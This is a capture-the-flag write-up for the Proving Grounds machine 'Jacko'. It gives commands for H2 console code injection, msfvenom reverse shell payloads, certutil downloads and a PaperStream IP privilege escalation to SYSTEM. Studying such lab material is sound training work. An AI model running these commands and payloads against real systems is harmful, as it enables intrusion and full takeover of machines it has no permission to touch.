Writeup for Jacko from offsec Proving Grounds
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Writeup for Jacko from offsec Proving Grounds
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sudo ./nmapAutomator.sh all
Once logged in, we notice that this is running H2 console version 1.4.199, which happens to be vulnerable to code injection via java.
We can test if this works by trying to execute the systeminfo
We first generate shell.exe
msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST= LPORT=8082
Next, we transfer shell.exe
via an HTTP server to the target machine.
certutil -urlcache -split -f C:/Windows/Temp/shell.exe
We can then execute shell.exe
to gain our reverse shell.
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:/Windows/Temp/shell.exe").getInputStream()).useDelimiter("\Z").next()');
Looks like we need to fix the path variable first:
set PATH=%SystemRoot%\system32;%SystemRoot%;
Transferring winPEAS:
cmd.exe /c certutil -urlcache -split -f winPEASx86.exe
Running winPEAS, we see the following.
However, both of these can't work in our case.
Under Program Files (x86)
directory, we see PaperStream IP
We can copy the power shell script above and generate shell.dll
msfvenom -p windows/shell_reverse_tcp -f dll -o shell.dll LHOST= LPORT=8082
Next, we transfer both files to the target machine.
And once we run exploit.ps1, we get SYSTEM.